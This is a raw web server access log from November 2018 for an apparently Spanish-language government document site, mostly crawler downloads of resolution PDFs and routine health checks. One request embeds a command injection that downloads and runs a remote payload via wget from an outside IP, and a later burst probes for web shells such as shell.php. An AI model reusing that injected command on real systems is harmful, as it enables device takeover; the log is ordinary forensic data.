35.192.84.7 - - [10/Nov/2018:02:29:56 -0500] "GET /robots.txt HTTP/1.1" 404 1018
69.162.124.232 - - [10/Nov/2018:02:29:56 -0500] "HEAD / HTTP/1.1" 200 -
220.181.125.82 - - [10/Nov/2018:02:30:01 -0500] "GET /resoluciones/RESOLUCIONES%202009/0854.pdf HTTP/1.1" 404 1018
220.181.125.82 - - [10/Nov/2018:02:30:01 -0500] "GET /robots.txt HTTP/1.1" 404 1018
220.181.125.82 - - [10/Nov/2018:02:30:11 -0500] "GET /resoluciones/RESOLUCIONES%202009/0740.pdf HTTP/1.1" 404 1018
220.181.125.82 - - [10/Nov/2018:02:30:21 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12505
220.181.125.82 - - [10/Nov/2018:02:30:32 -0500] "GET /BLA/resoluciones/AUTOS%202015/1052.pdf HTTP/1.1" 304 -
220.181.125.82 - - [10/Nov/2018:02:30:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1042.pdf HTTP/1.1" 304 -
66.249.69.105 - - [10/Nov/2018:02:30:59 -0500] "GET /BLA/resoluciones/AUTOS%202012/0480.pdf HTTP/1.1" 200 491460
220.181.125.82 - - [10/Nov/2018:02:31:02 -0500] "GET / HTTP/1.0" 400 946
66.249.69.105 - - [10/Nov/2018:02:31:07 -0500] "GET /BLA/resoluciones/AUTOS%202010/0856.pdf HTTP/1.1" 200 226159
66.249.69.105 - - [10/Nov/2018:02:31:12 -0500] "GET /BLA/resoluciones/AUTOS%202012/2350.pdf HTTP/1.1" 200 501544
66.249.75.203 - - [10/Nov/2018:02:31:36 -0500] "GET /ecodirectorio/files/res/navbtn/fullscreen.swf HTTP/1.1" 404 1019
66.249.69.105 - - [10/Nov/2018:02:31:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1093.pdf HTTP/1.1" 200 332467
66.249.69.105 - - [10/Nov/2018:02:32:04 -0500] "GET /BLA/resoluciones/Autos%202008/1628.pdf HTTP/1.1" 200 66657
216.244.66.197 - - [10/Nov/2018:02:32:08 -0500] "GET /POT-2013/Cartografia/12_Est_Ordenam_Regiona_2013_v1.pdf HTTP/1.1" 200 6613799
220.181.125.82 - - [10/Nov/2018:02:31:04 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 60944
66.249.69.105 - - [10/Nov/2018:02:32:59 -0500] "GET /BLA/resoluciones/Autos%202008/1424.pdf HTTP/1.1" 200 300121
66.249.69.105 - - [10/Nov/2018:02:33:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2016.pdf HTTP/1.1" 200 492903
66.249.69.109 - - [10/Nov/2018:02:33:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0059.pdf HTTP/1.1" 200 325464
192.168.175.104 - - [10/Nov/2018:02:33:22 -0500] "GET / HTTP/1.1" 200 9990
54.36.148.42 - - [10/Nov/2018:02:33:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201051-1100/00001085.tif HTTP/1.1" 200 216960
192.168.175.104 - - [10/Nov/2018:02:33:45 -0500] "GET / HTTP/1.0" 200 9990
66.249.69.107 - - [10/Nov/2018:02:33:45 -0500] "GET /BLA/resoluciones/AUTOS%202009/0053.pdf HTTP/1.1" 200 82233
54.36.148.50 - - [10/Nov/2018:02:33:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%202201-2250/00002236.tif HTTP/1.1" 200 179234
66.249.69.105 - - [10/Nov/2018:02:34:01 -0500] "GET /BLA/resoluciones/AUTOS%202009/0428.pdf HTTP/1.1" 200 354547
66.249.69.105 - - [10/Nov/2018:02:34:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0970.pdf HTTP/1.1" 200 7233237
201.245.192.253 - - [10/Nov/2018:02:33:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 25050
66.249.69.107 - - [10/Nov/2018:02:34:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4225.pdf HTTP/1.1" 200 100472
66.249.69.105 - - [10/Nov/2018:02:34:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6312.pdf HTTP/1.1" 200 2104887
66.249.69.113 - - [10/Nov/2018:02:34:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4787.pdf HTTP/1.1" 200 335568
69.162.124.232 - - [10/Nov/2018:02:34:56 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.105 - - [10/Nov/2018:02:35:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204274%20DE%202007.pdf HTTP/1.1" 200 311077
66.249.69.111 - - [10/Nov/2018:02:35:30 -0500] "GET /BLA/resoluciones/AUTOS%202012/1875.pdf HTTP/1.1" 200 616587
185.233.245.220 - - [10/Nov/2018:02:36:22 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.107 - - [10/Nov/2018:02:36:23 -0500] "GET /BLA/resoluciones/AUTOS%202012/0914.pdf HTTP/1.1" 200 332506
66.249.69.105 - - [10/Nov/2018:02:36:58 -0500] "GET /BLA/resoluciones/AUTOS%202012/1080.pdf HTTP/1.1" 200 227297
192.168.175.104 - - [10/Nov/2018:02:38:20 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [10/Nov/2018:02:38:43 -0500] "GET / HTTP/1.0" 200 9990
52.162.211.179 - - [10/Nov/2018:02:39:17 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
52.162.211.179 - - [10/Nov/2018:02:39:17 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
52.162.211.179 - - [10/Nov/2018:02:39:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.69.107 - - [10/Nov/2018:02:39:23 -0500] "GET /BLA/resoluciones/Autos%202008/2634.pdf HTTP/1.1" 200 63893
54.36.149.50 - - [10/Nov/2018:02:39:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201001-1050/00001023.tif HTTP/1.1" 200 117328
52.162.211.179 - - [10/Nov/2018:02:39:33 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
52.162.211.179 - - [10/Nov/2018:02:39:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
52.162.211.179 - - [10/Nov/2018:02:39:33 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.69.107 - - [10/Nov/2018:02:39:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/1321.pdf HTTP/1.1" 200 1178901
69.162.124.232 - - [10/Nov/2018:02:39:56 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.105 - - [10/Nov/2018:02:40:04 -0500] "GET /BLA/resoluciones/AUTOS%202009/3357.pdf HTTP/1.1" 200 206915
66.249.69.105 - - [10/Nov/2018:02:40:06 -0500] "GET /BLA/resoluciones/AUTOS%202009/0076.pdf HTTP/1.1" 200 56979
66.249.69.105 - - [10/Nov/2018:02:40:20 -0500] "GET /BLA/resoluciones/AUTOS%202009/2818.pdf HTTP/1.1" 200 95564
207.46.13.31 - - [10/Nov/2018:02:41:22 -0500] "GET /SIG/ECS/126PM04-PR80.pdf HTTP/1.1" 200 2172597
66.249.69.109 - - [10/Nov/2018:02:41:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6929.pdf HTTP/1.1" 304 -
66.249.69.105 - - [10/Nov/2018:02:43:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203701%20AL%203800/RESOLUCION%203718%20DE%202007.pdf HTTP/1.1" 200 689579
192.168.175.104 - - [10/Nov/2018:02:43:18 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.107 - - [10/Nov/2018:02:43:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202801%20AL%202900/RESOLUCION%202881%20DE%202007.pdf HTTP/1.1" 304 -
192.168.175.104 - - [10/Nov/2018:02:43:41 -0500] "GET / HTTP/1.0" 200 9990
66.249.69.107 - - [10/Nov/2018:02:44:12 -0500] "GET /BLA/resoluciones/AUTOS%202007/3155.pdf HTTP/1.1" 200 83813
66.249.69.105 - - [10/Nov/2018:02:44:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7002.pdf HTTP/1.1" 200 66055
69.162.124.232 - - [10/Nov/2018:02:44:56 -0500] "HEAD / HTTP/1.1" 200 -
186.155.171.237 - - [10/Nov/2018:02:45:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.155.171.237 - - [10/Nov/2018:02:45:29 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.155.171.237 - - [10/Nov/2018:02:45:29 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.69.105 - - [10/Nov/2018:02:45:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0632.pdf HTTP/1.1" 200 285912
216.244.66.195 - - [10/Nov/2018:02:45:46 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.69.107 - - [10/Nov/2018:02:47:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6456.pdf HTTP/1.1" 200 365458
195.154.122.114 - - [10/Nov/2018:02:47:32 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
195.154.122.114 - - [10/Nov/2018:02:47:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
195.154.122.114 - - [10/Nov/2018:02:47:32 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
195.154.122.114 - - [10/Nov/2018:02:47:32 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
195.154.122.114 - - [10/Nov/2018:02:47:32 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
195.154.122.114 - - [10/Nov/2018:02:47:33 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
195.154.122.114 - - [10/Nov/2018:02:47:33 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 200 17734
195.154.122.114 - - [10/Nov/2018:02:47:33 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
195.154.122.114 - - [10/Nov/2018:02:47:33 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
195.154.122.114 - - [10/Nov/2018:02:47:33 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
195.154.122.114 - - [10/Nov/2018:02:47:33 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
195.154.122.114 - - [10/Nov/2018:02:47:34 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
195.154.122.114 - - [10/Nov/2018:02:47:34 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
195.154.122.114 - - [10/Nov/2018:02:47:34 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
54.36.149.88 - - [10/Nov/2018:02:47:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%2001-%2050/00000006.tif HTTP/1.1" 200 31896
192.168.175.104 - - [10/Nov/2018:02:48:16 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.107 - - [10/Nov/2018:02:48:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0628.pdf HTTP/1.1" 200 333977
66.249.69.105 - - [10/Nov/2018:02:48:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0775.pdf HTTP/1.1" 200 4250452
192.168.175.104 - - [10/Nov/2018:02:48:39 -0500] "GET / HTTP/1.0" 200 9990
181.137.39.246 - - [10/Nov/2018:02:48:48 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.137.39.246 - - [10/Nov/2018:02:48:48 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.137.39.246 - - [10/Nov/2018:02:48:48 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.69.105 - - [10/Nov/2018:02:49:17 -0500] "GET /BLA/resoluciones/AUTOS%202010/1460.pdf HTTP/1.1" 200 245463
66.249.69.107 - - [10/Nov/2018:02:49:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20451-500/457.tif HTTP/1.1" 200 213988
80.134.111.36 - - [10/Nov/2018:02:49:35 -0500] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1" 400 946
69.162.124.232 - - [10/Nov/2018:02:49:56 -0500] "HEAD / HTTP/1.1" 200 -
54.36.148.99 - - [10/Nov/2018:02:50:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20101-150/2003RES119.tif HTTP/1.1" 200 187112
66.249.69.109 - - [10/Nov/2018:02:50:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1197.pdf HTTP/1.1" 304 -
207.46.13.23 - - [10/Nov/2018:02:51:06 -0500] "GET /SIG/Gestion%20Documental/126PA06-PR01%20CONTROL%20DOCUMENTOS%20SIG.pdf HTTP/1.1" 200 377965
192.168.175.104 - - [10/Nov/2018:02:53:14 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [10/Nov/2018:02:53:37 -0500] "GET / HTTP/1.0" 200 9990
66.249.69.105 - - [10/Nov/2018:02:53:46 -0500] "GET /BLA/resoluciones/Autos%202008/0365.pdf HTTP/1.1" 200 153127
207.46.13.31 - - [10/Nov/2018:02:53:56 -0500] "GET /POT-2013/Cartografia/02_Clasificacion_Urbano_V1_2013.pdf HTTP/1.1" 200 5081898
69.162.124.232 - - [10/Nov/2018:02:54:56 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.163 - - [10/Nov/2018:02:55:09 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2022%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1563219
207.46.13.103 - - [10/Nov/2018:02:55:25 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C%20401%20de%202010.doc HTTP/1.1" 200 34816
66.249.88.33 - - [10/Nov/2018:02:56:06 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.88.62 - - [10/Nov/2018:02:56:06 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.88.63 - - [10/Nov/2018:02:56:06 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
161.10.35.184 - - [10/Nov/2018:02:56:28 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
161.10.35.184 - - [10/Nov/2018:02:56:28 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
161.10.35.184 - - [10/Nov/2018:02:56:28 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
161.10.35.184 - - [10/Nov/2018:02:56:34 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 304 -
161.10.35.184 - - [10/Nov/2018:02:56:34 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 304 -
161.10.35.184 - - [10/Nov/2018:02:56:34 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
35.192.84.7 - - [10/Nov/2018:02:56:34 -0500] "GET /robots.txt HTTP/1.1" 404 1018
35.192.84.7 - - [10/Nov/2018:02:57:13 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
178.255.215.65 - - [10/Nov/2018:02:57:42 -0500] "GET /robots.txt HTTP/1.1" 404 1019
178.255.215.65 - - [10/Nov/2018:02:57:42 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [10/Nov/2018:02:58:12 -0500] "GET / HTTP/1.1" 200 9990
54.36.148.222 - - [10/Nov/2018:02:58:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%20601-650/00000605.tif HTTP/1.1" 200 218812
192.168.175.104 - - [10/Nov/2018:02:58:35 -0500] "GET / HTTP/1.0" 200 9990
195.154.122.27 - - [10/Nov/2018:02:58:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
195.154.122.27 - - [10/Nov/2018:02:58:50 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
195.154.122.27 - - [10/Nov/2018:02:58:50 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
207.46.13.103 - - [10/Nov/2018:02:58:59 -0500] "GET /transparencia/directorioservidores/2017/agosto.xlsx HTTP/1.1" 200 88875
66.249.69.109 - - [10/Nov/2018:02:59:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2204.pdf HTTP/1.1" 200 509777
69.162.124.232 - - [10/Nov/2018:02:59:56 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.197 - - [10/Nov/2018:03:01:57 -0500] "GET /robots.txt HTTP/1.1" 404 1019
66.249.69.105 - - [10/Nov/2018:03:02:18 -0500] "GET /BLA/resoluciones/AUTOS%202012/2257.pdf HTTP/1.1" 200 357838
66.249.69.107 - - [10/Nov/2018:03:02:54 -0500] "GET /BLA/resoluciones/AUTOS%202012/1250.pdf HTTP/1.1" 200 395842
192.168.175.104 - - [10/Nov/2018:03:03:10 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.109 - - [10/Nov/2018:03:03:16 -0500] "GET /BLA/resoluciones/AUTOS%202007/0682.pdf HTTP/1.1" 200 203092
192.168.175.104 - - [10/Nov/2018:03:03:34 -0500] "GET / HTTP/1.0" 200 9990
54.36.148.211 - - [10/Nov/2018:03:03:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%202151-2200/00002196.tif HTTP/1.1" 200 295494
37.115.191.132 - - [10/Nov/2018:03:04:04 -0500] "GET / HTTP/1.1" 200 9990
37.115.191.132 - - [10/Nov/2018:03:04:05 -0500] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
66.249.69.109 - - [10/Nov/2018:03:04:25 -0500] "GET /galeria/galeria/fotos/Humedal-techo1P.jpg HTTP/1.1" 304 -
66.249.69.105 - - [10/Nov/2018:03:04:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204325%20DE%202007.pdf HTTP/1.1" 200 983740
66.249.69.107 - - [10/Nov/2018:03:04:45 -0500] "GET /BLA/resoluciones/AUTOS%202007/0461.pdf HTTP/1.1" 200 18231
69.162.124.232 - - [10/Nov/2018:03:04:56 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.109 - - [10/Nov/2018:03:05:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/1714.pdf HTTP/1.1" 200 624455
54.36.148.58 - - [10/Nov/2018:03:06:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20101-150/2002RES106.tif HTTP/1.1" 200 47960
66.249.69.105 - - [10/Nov/2018:03:06:42 -0500] "GET /BLA/resoluciones/AUTOS%202012/1514.pdf HTTP/1.1" 200 465167
192.168.175.104 - - [10/Nov/2018:03:08:08 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [10/Nov/2018:03:08:33 -0500] "GET / HTTP/1.0" 200 9990
66.249.69.105 - - [10/Nov/2018:03:08:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1855.pdf HTTP/1.1" 200 740070
66.249.69.105 - - [10/Nov/2018:03:09:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6682.pdf HTTP/1.1" 200 266858
54.36.148.32 - - [10/Nov/2018:03:09:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20201-250/2002RES237.tif HTTP/1.1" 200 40394
66.249.69.105 - - [10/Nov/2018:03:09:38 -0500] "GET /BLA/resoluciones/AUTOS%202011/0226.pdf HTTP/1.1" 200 1560895
66.249.69.105 - - [10/Nov/2018:03:09:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20801%20AL%20900/RESOLUCION%200837%20DE%202007.pdf HTTP/1.1" 200 167649
69.162.124.232 - - [10/Nov/2018:03:09:56 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.109 - - [10/Nov/2018:03:10:21 -0500] "GET /BLA/resoluciones/AUTOS%202009/0526.pdf HTTP/1.1" 200 319778
54.36.148.140 - - [10/Nov/2018:03:10:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201851-1900/20021874.tif HTTP/1.1" 200 79816
66.249.69.107 - - [10/Nov/2018:03:10:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6825.pdf HTTP/1.1" 200 478837
66.249.69.105 - - [10/Nov/2018:03:11:03 -0500] "GET /BLA/resoluciones/AUTOS%202012/2181.pdf HTTP/1.1" 200 1493911
83.45.118.231 - - [10/Nov/2018:03:11:18 -0500] "GET /wp-login.php HTTP/1.1" 404 1019
83.45.118.231 - - [10/Nov/2018:03:11:18 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.105 - - [10/Nov/2018:03:11:21 -0500] "GET /BLA/resoluciones/AUTOS%202009/1019.pdf HTTP/1.1" 200 86252
66.249.69.107 - - [10/Nov/2018:03:11:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201501%20AL%201600/RESOLUCION%201569%20DE%202007.pdf HTTP/1.1" 200 1319569
207.46.13.210 - - [10/Nov/2018:03:11:49 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
66.249.69.105 - - [10/Nov/2018:03:11:52 -0500] "GET /BLA/resoluciones/Autos%202008/3125.pdf HTTP/1.1" 200 57737
66.249.69.105 - - [10/Nov/2018:03:11:58 -0500] "GET /BLA/resoluciones/AUTOS%202009/0099.pdf HTTP/1.1" 200 62324
66.249.69.107 - - [10/Nov/2018:03:12:14 -0500] "GET /BLA/resoluciones/Autos%202008/3008.pdf HTTP/1.1" 200 117776
181.232.87.219 - - [10/Nov/2018:03:12:38 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.232.87.219 - - [10/Nov/2018:03:12:38 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.232.87.219 - - [10/Nov/2018:03:12:38 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.24.56.16 - - [10/Nov/2018:03:12:41 -0500] "GET /galeria/galeria/fotos/diaSC6.jpg HTTP/1.1" 200 117970
54.36.148.32 - - [10/Nov/2018:03:12:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%201751-1800/20031775.tif HTTP/1.1" 200 1355478
66.249.69.105 - - [10/Nov/2018:03:13:02 -0500] "GET /BLA/resoluciones/AUTOS%202009/2714.pdf HTTP/1.1" 200 108953
66.249.69.107 - - [10/Nov/2018:03:13:03 -0500] "GET /BLA/resoluciones/AUTOS%202007/0374.pdf HTTP/1.1" 200 173102
192.168.175.104 - - [10/Nov/2018:03:13:06 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [10/Nov/2018:03:13:31 -0500] "GET / HTTP/1.0" 200 9990
201.245.192.253 - - [10/Nov/2018:03:13:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 24620
66.249.69.105 - - [10/Nov/2018:03:14:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6407.pdf HTTP/1.1" 200 514628
201.245.192.253 - - [10/Nov/2018:03:14:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 20378
69.162.124.232 - - [10/Nov/2018:03:14:56 -0500] "HEAD / HTTP/1.1" 200 -
54.36.148.255 - - [10/Nov/2018:03:17:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201101-1150/00001139.tif HTTP/1.1" 200 142122
66.249.69.105 - - [10/Nov/2018:03:17:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7045.pdf HTTP/1.1" 200 64902
54.36.148.249 - - [10/Nov/2018:03:17:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201401-1450/00001416.tif HTTP/1.1" 200 132658
66.249.69.105 - - [10/Nov/2018:03:17:57 -0500] "GET /BLA/resoluciones/AUTOS%202012/2205.pdf HTTP/1.1" 200 361834
192.168.175.104 - - [10/Nov/2018:03:18:05 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [10/Nov/2018:03:18:29 -0500] "GET / HTTP/1.0" 200 9990
69.162.124.232 - - [10/Nov/2018:03:19:56 -0500] "HEAD / HTTP/1.1" 200 -
185.106.213.196 - - [10/Nov/2018:03:20:18 -0500] "-" 408 -
46.150.94.186 - - [10/Nov/2018:03:20:24 -0500] "GET / HTTP/1.1" 200 9990
216.244.66.197 - - [10/Nov/2018:03:21:07 -0500] "GET /galeria/nivo-slider/firefile.php HTTP/1.1" 200 4094
66.249.75.79 - - [10/Nov/2018:03:21:13 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
66.249.75.83 - - [10/Nov/2018:03:21:13 -0500] "GET /robots.txt HTTP/1.1" 404 1031
66.249.75.83 - - [10/Nov/2018:03:21:13 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
66.249.75.83 - - [10/Nov/2018:03:21:15 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
66.249.75.81 - - [10/Nov/2018:03:21:17 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
66.249.75.79 - - [10/Nov/2018:03:21:19 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
66.249.75.79 - - [10/Nov/2018:03:21:21 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
192.168.175.104 - - [10/Nov/2018:03:23:04 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [10/Nov/2018:03:23:27 -0500] "GET / HTTP/1.0" 200 9990
66.249.75.83 - - [10/Nov/2018:03:23:43 -0500] "GET /catalogoisis/Diccionario.php?i=5&form=0&element=9&prefix=&first=yes HTTP/1.1" 200 4194
201.245.192.253 - - [10/Nov/2018:03:23:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 24620
186.113.10.19 - - [10/Nov/2018:03:24:55 -0500] "GET /galeria/nivo-slider/demo/images/banner-corporativa.jpg HTTP/1.1" 304 -
69.162.124.232 - - [10/Nov/2018:03:24:56 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.104 - - [10/Nov/2018:03:28:01 -0500] "GET / HTTP/1.1" 200 9990
180.76.163.218 - - [10/Nov/2018:03:28:25 -0500] "GET /help.php HTTP/1.1" 404 1018
192.168.175.104 - - [10/Nov/2018:03:28:25 -0500] "GET / HTTP/1.0" 200 9990
180.76.163.218 - - [10/Nov/2018:03:28:27 -0500] "GET /java.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:28:37 -0500] "GET /db_cts.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:28:48 -0500] "GET /db_pma.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:28:53 -0500] "GET /help-e.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:28:54 -0500] "GET /license.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:28:55 -0500] "GET /log.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:28:59 -0500] "GET /hell.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:28:59 -0500] "GET /pmd_online.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:01 -0500] "GET /shell.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:02 -0500] "GET /htdocs.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:03 -0500] "GET /desktop.ini.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:04 -0500] "GET /z.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:05 -0500] "GET /lala.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:06 -0500] "GET /lala-dpr.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:07 -0500] "GET /wpo.php HTTP/1.1" 404 1018
